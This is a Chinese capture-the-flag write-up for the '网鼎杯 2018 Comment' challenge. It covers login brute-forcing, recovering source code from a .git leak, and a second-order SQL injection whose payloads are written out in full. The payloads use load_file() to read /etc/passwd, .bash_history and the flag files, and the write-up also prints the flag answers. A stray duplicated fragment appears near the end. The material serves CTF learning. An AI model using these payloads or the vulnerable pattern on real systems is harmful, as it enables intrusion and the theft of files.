[网鼎杯 2018]Comment

使用环境为https://adworld.xctf.org.cn/challenges，搜索题目[网鼎杯 2018]Comment。

进入环境，发现为一个留言板，点击发帖试试。

尝试发帖

跳转到登录页面，根据提示使用burp进行暴力破解。

发现payload为666时状态码不同。

尝试密码为zhangwei666发现登录成功。

使用awvs进行扫描。发现存在.git目录，并且存在git泄露漏洞。尝试使用githacker恢复源码。

刚恢复完是一段残缺的代码，需要进行恢复到完整代码

git log --reflog
git reset --hard 版本

完整源码

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){header("Location: ./login.php");die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':$category = addslashes($_POST['category']);$title = addslashes($_POST['title']);$content = addslashes($_POST['content']);$sql = "insert into boardset category = '$category',title = '$title',content = '$content'";$result = mysql_query($sql);header("Location: ./index.php");break;
case 'comment':$bo_id = addslashes($_POST['bo_id']);$sql = "select category from board where id='$bo_id'";$result = mysql_query($sql);$num = mysql_num_rows($result);if($num>0){$category = mysql_fetch_array($result)['category'];$content = addslashes($_POST['content']);$sql = "insert into commentset category = '$category',content = '$content',bo_id = '$bo_id'";$result = mysql_query($sql);}header("Location: ./comment.php?id=$bo_id");break;
default:header("Location: ./index.php");
}
}
else{header("Location: ./index.php");
}
?>

分析代码可知，当do=write时，传入的参数中的单引号均被过滤掉，而当do=comment时，category被直接拿来用，没有被过滤单引号，那么二次注入点就在此。

构建payload：

在do=write时，title和content随便写，将category写成下面payload

',content=database(),/*

然后在do=comment时，将content写成

*/#

也就合成了一个查询函数

    $sql = "insert into commentset category = '',content=database(),/*',content = '*/#',bo_id = '$bo_id'";

查询flag是根据网上的资料查找的。

查看当前登录的用户

',content=user(),/*

得知使用者是root权限

sql注入读取本地文件，使用load_file()
/etc/passwd这里存储用户信息

',content=(select load_file('/etc/passwd')),/*

有一个www用户，查看bash_history

',content=(select load_file('/home/www/.bash_history')),/*

发现有一操作rm -f .DS_Store删除了.DS_Store这个文件。而 .DS_Store 文件中，经常会有一些不可见的字符，可以使用hex函数对其进行16进制转换。

',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

全部复制并且进行ascii 十六进制解码。

发现有一段flag_8946e1ff1ee3e40f.php，尝试查看这个文件

',content=(select load_file('/tmp/html/flag_8946e1ff1ee3e40f.php')),/*

发现为空，那就加上hex尝试

',content=(select hex(load_file('/tmp/html/flag_8946e1ff1ee3e40f.php'))),/*

解码

得到结果

<?php
$flag = 'flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}';
?>

但是提交答案发现是假的，尝试其他目录

',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

解码

<?php$flag="flag{0dd14aae81d94904b3492117e2a3d4df}";
?>

ee3e40f.php’))),/*

[外链图片转存中...(img-EZ2sqSXR-1722830529065)]解码[外链图片转存中...(img-OSTJQXO8-1722830529065)]

<?php $flag="flag{0dd14aae81d94904b3492117e2a3d4df}"; ?>

得到正确的flag